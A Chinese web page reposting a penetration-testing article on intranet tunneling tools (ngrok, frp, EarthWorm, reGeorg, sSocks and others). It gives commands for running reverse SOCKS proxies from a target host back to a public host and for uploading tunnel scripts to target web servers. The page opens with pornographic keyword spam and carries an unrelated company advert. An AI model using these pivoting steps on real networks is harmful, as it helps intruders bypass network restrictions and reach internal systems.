日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
好用的內(nèi)網(wǎng)穿透工具合集

本文轉(zhuǎn)載自微信公眾號「Bypass 」,作者Bypass 。轉(zhuǎn)載本文請聯(lián)系Bypass公眾號。

公司主營業(yè)務(wù):網(wǎng)站設(shè)計(jì)、成都網(wǎng)站制作、移動(dòng)網(wǎng)站開發(fā)等業(yè)務(wù)。幫助企業(yè)客戶真正實(shí)現(xiàn)互聯(lián)網(wǎng)宣傳,提高企業(yè)的競爭能力。創(chuàng)新互聯(lián)建站是一支青春激揚(yáng)、勤奮敬業(yè)、活力青春激揚(yáng)、勤奮敬業(yè)、活力澎湃、和諧高效的團(tuán)隊(duì)。公司秉承以“開放、自由、嚴(yán)謹(jǐn)、自律”為核心的企業(yè)文化,感謝他們對我們的高要求,感謝他們從不同領(lǐng)域給我們帶來的挑戰(zhàn),讓我們激情的團(tuán)隊(duì)有機(jī)會(huì)用頭腦與智慧不斷的給客戶帶來驚喜。創(chuàng)新互聯(lián)建站推出寶山免費(fèi)做網(wǎng)站回饋大家。

在滲透過程中,我們需要快速實(shí)現(xiàn)內(nèi)網(wǎng)穿透,從而繞過網(wǎng)絡(luò)訪問限制,直接從外網(wǎng)來訪問內(nèi)網(wǎng)。今天,我們來推薦幾款非常好用的內(nèi)網(wǎng)穿透工具,如有其它推薦,歡迎補(bǔ)充和指正。

1、ngrok

ngrok 是一個(gè)反向代理,通過在公共的端點(diǎn)和本地運(yùn)行的 Web 服務(wù)器之間建立一個(gè)安全的通道。

官網(wǎng)地址:

 
 
 
 
  1. https://ngrok.com 

使用步驟:

(1)進(jìn)入ngrok官網(wǎng)注冊賬號,并下載ngrok。

(2)在目標(biāo)機(jī)器上,填寫授權(quán)碼,運(yùn)行ngrok。

 
 
 
 
  1. ./ngrok authtoken 授權(quán)碼 

(3)將HTTP隧道轉(zhuǎn)發(fā)到本地端口80,如下圖,通過外網(wǎng)域名即可訪問到本地80端口。

 
 
 
 
  1. ./ngrok http 80 

2、frp

frp 是一個(gè)高性能的反向代理應(yīng)用,可以幫助您輕松地進(jìn)行內(nèi)網(wǎng)穿透,對外網(wǎng)提供服務(wù),支持 tcp, http, https 等協(xié)議類型,并且 web 服務(wù)支持根據(jù)域名進(jìn)行路由轉(zhuǎn)發(fā)。

git項(xiàng)目地址:

 
 
 
 
  1. https://github.com/fatedier/frp 

使用步驟:

(1)將 frps 及 frps.ini 放到有公網(wǎng) IP 的機(jī)器上,修改frps.ini文件,配置一個(gè)名為ssh的反向代理:

 
 
 
 
  1. # frps.ini 
  2. [common] 
  3. bind_port = 7000 
  4.  
  5. [ssh] 
  6. listen_port=6000 
  7. auth_token=123 

(2)啟動(dòng)frps:

 
 
 
 
  1. ./frps -c ./frps.ini 

(3)將 frpc 及 frpc.ini 放到處于內(nèi)網(wǎng)環(huán)境的機(jī)器上,修改 frpc.ini 文件,設(shè)置 frps 所在服務(wù)器的 IP 為 x.x.x.x:

 
 
 
 
  1. # frpc.ini 
  2. [common] 
  3. server_addr = 192.168.172.131 
  4. server_port = 7000 
  5. auth_token =123 
  6.  
  7. [ssh] 
  8. type = tcp 
  9. local_ip = 127.0.0.1 
  10. local_port = 22 
  11. remote_port = 6000 

(4)啟動(dòng)frpc:

 
 
 
 
  1. ./frpc -c ./frpc.ini 

(5)通過ssh訪問內(nèi)網(wǎng)服務(wù)器,假設(shè)用戶名為test:

 
 
 
 
  1. ssh -p 6000 test@x.x.x.x 

3、Sunny-Ngrok

一條命令解決的外網(wǎng)訪問內(nèi)網(wǎng)問題,無需任何配置,一條命令讓外網(wǎng)訪問您的內(nèi)網(wǎng)不再是距離。Ngrok客戶端,支持Windows、Linux、Mac,提供python、PHP等版本。

官網(wǎng)地址:

 
 
 
 
  1. https://www.ngrok.cc 

使用步驟:

(1) 開通http隧道,設(shè)置隧道協(xié)議、本地端口等信息。

(2)通過隧道id啟動(dòng)隧道。

(3)在公網(wǎng)上訪問域名,即可訪問到內(nèi)網(wǎng)的網(wǎng)站。

4、Natapp

基于ngrok的內(nèi)網(wǎng)映射工具,免費(fèi)版本提供http,tcp,udp全隧道穿透、隨機(jī)域名/隨機(jī)TCP,UDP端口、不定時(shí)強(qiáng)制更換域名/端口和自定義本地端口。

下載地址:

 
 
 
 
  1. https://natapp.cn 

(1)購買隧道,設(shè)置隧道協(xié)議和本地端口。

(2)下載客戶端,到目標(biāo)主機(jī),運(yùn)行natapp。

(3)將natapp分配的網(wǎng)址復(fù)制下來,在瀏覽器中訪問,可以看到內(nèi)網(wǎng)穿透成功了!

5、Earthworm 內(nèi)網(wǎng)穿透

EW 是一套便攜式的網(wǎng)絡(luò)穿透工具,具有 SOCKS v5服務(wù)架設(shè)和端口轉(zhuǎn)發(fā)兩大核心功能,可在復(fù)雜網(wǎng)絡(luò)環(huán)境下完成網(wǎng)絡(luò)穿透。

支持Windows、Linux、MacOS、Arm-Linux。

項(xiàng)目地址:

 
 
 
 
  1. http://rootkiter.com/EarthWorm 

使用方法:

(1)正向 SOCKS v5 服務(wù)器,適用于目標(biāo)網(wǎng)絡(luò)邊界存在公網(wǎng)IP且可任意開監(jiān)聽端口。

 
 
 
 
  1. ./ew -s ssocksd -l 1080 

(2)反彈SOCKS v5 服務(wù)器,適用于目標(biāo)網(wǎng)絡(luò)邊界不存在公網(wǎng) IP,需要通過反彈方式創(chuàng)建 socks 代理

 
 
 
 
  1. a) 先在一臺(tái)具有公網(wǎng) ip 的主機(jī)A上運(yùn)行以下命令: 
  2.  ./ew -s rcsocks -l 1080 -e 8888 
  3.  
  4.   b) 在目標(biāo)主機(jī)B上啟動(dòng) SOCKS v5 服務(wù) 并反彈到公網(wǎng)主機(jī)的 8888端口 
  5.   ./ew -s rssocks -d 1.1.1.1 -e 8888 

(3)多級級聯(lián),適用于多層級的復(fù)雜網(wǎng)絡(luò)環(huán)境,將內(nèi)網(wǎng)深層的服務(wù)轉(zhuǎn)發(fā)到外網(wǎng)。

 
 
 
 
  1. ## 二級級聯(lián)測試用例 
  2.  
  3. # 方式一:利用lcx_tran 
  4.  $ ./ew -s ssocksd  -l 9999 
  5.  $ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999 
  6.  
  7. # 方式二: 
  8.  $ ./ew -s lcx_listen -l 1080 -e 8888 
  9.  $ ./ew -s ssocksd    -l 9999 
  10.  $ ./ew -s lcx_slave  -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999 
  11.  
  12. ## 三級級聯(lián)測試用例 
  13.  
  14.   $ ./ew -s rcsocks -l 1080 -e 8888 
  15.   $ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999 
  16.   $ ./ew -s lcx_listen -l 9999 -e 7777 
  17.   $ ./ew -s rssocks -d 127.0.0.1 -e 7777 

6、reDuh

ReDuh 是一個(gè)通過 HTTP 協(xié)議建立隧道傳輸各種其他數(shù)據(jù)的工具,通過在服務(wù)器上傳JSP/PHP/ASP腳本,就可以輕易地連接到服務(wù)器后面的主機(jī)。

github項(xiàng)目地址:

 
 
 
 
  1. https://github.com/sensepost/reDuh 

(1)上傳服務(wù)端jsp腳本到目標(biāo)機(jī)器

(2)使用reDuh客戶端連接服務(wù)端腳本上傳后的地址。

 
 
 
 
  1. java -jar reDuhClient.jar http://192.168.172.1/reDuh.jsp 

7、reGeorg

reGeorg是reDuh的繼承者,利用了會(huì)話層的socks5協(xié)議,結(jié)合Proxifier使用效率會(huì)更高。

下載地址:

 
 
 
 
  1. https://github.com/sensepost/reGeorg 

使用方法:

(1)1、將 tunnel腳本(aspx | ashx | jsp | php)上傳到Web服務(wù)器,訪問顯示“Georg says, ‘All seems fine’“,表示腳本運(yùn)行正常。

(2)在攻擊者機(jī)器上,啟動(dòng)reGeorgSocksProxy.py,監(jiān)聽9999端口,看到 Checking if Georg is ready,確認(rèn)正常運(yùn)行。

8、Tunna

Tunna是一款神奇的工具,它可以通過HTTP封裝隧道通信任何TCP,以及用于繞過防火墻環(huán)境中的網(wǎng)絡(luò)限制。

github項(xiàng)目地址:

 
 
 
 
  1. https://github.com/SECFORCE/Tunna 

9、sSocks

sSocks是一個(gè)socks代理工具套裝,可用來開啟socks代理服務(wù),支持socks5驗(yàn)證,支持IPV6和UDP,并提供反向socks代理服務(wù),即將遠(yuǎn)程計(jì)算機(jī)作為socks代理服務(wù)端,反彈回本地,極大方便內(nèi)網(wǎng)的滲透測試。

下載地址:

 
 
 
 
  1. http://sourceforge.net/projects/ssocks/ 

使用方法:

(1)正向代理

 
 
 
 
  1. ./ssocksd --bind 192.168.172.131 --port 1234 

(2)反向代理

 
 
 
 
  1. ## 監(jiān)聽6020端口轉(zhuǎn)發(fā)到6010 
  2. ./rcsocks -l 6020 -p 6010 -vv 
  3.  
  4. ## 反向連接代理主機(jī)6010端口 
  5. ./rssocks -s 192.168.172.131:6010 -vv 

文章題目:好用的內(nèi)網(wǎng)穿透工具合集
當(dāng)前路徑:http://www.dlmjj.cn/article/dpioogj.html